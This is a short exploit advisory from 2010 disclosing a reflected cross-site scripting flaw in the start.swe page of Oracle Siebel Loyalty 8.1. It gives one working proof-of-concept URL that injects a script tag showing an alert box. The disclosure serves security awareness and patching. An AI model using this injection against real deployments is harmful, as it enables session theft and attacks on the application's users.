--------------------------------------------------------------------
# Exploit Title: Oracle Siebel Loyalty 8.1 XSS Vulnerability
# Date: 24 Feb 2010
# Author: thebluegenius
# Software Link: http://bit.ly/bZ7JdV
# Version: 8.1
# CVE : NA

---------------------------------------------------
"Oracle Siebel Loyalty 8.1 XSS Vulnerability.
---------------------------------------------------
By       :Thebluegenius. 
Email    :rajsm@isac.org.in
Blog   :www.thebluegenius.com.
---------------------------------------------------

Description:

Siebel Loyalty Management provides a unique multi-channel and multi-partner solution that allows organizations to transform loyalty program effectiveness and significantly increase customer retention and value. It supports the entire loyalty marketing lifecycle and includes deep industry and best practices support for member enrollment and management, points accrual and redemption, personalized loyalty promotions and member communications, multi-channel customer care, and cross-industry partner management.

------------------
Vulnerability: XSS
------------------
The start.swe page is affected by the vulnerability.

you can execute XSS as given below:

http://server/loyalty_enu/start.swe/%3E%22%3E%3Cscript%3Ealert('Reflected%20XSS')%3C/script%3E


-----------------------------------------------------
Greetz Fly Out to:
1] Amforked()  : My good friend
2] Aodrulez    : for inspiring me
3] www.Orchidseven.com : for Research
4] www.isac.org.in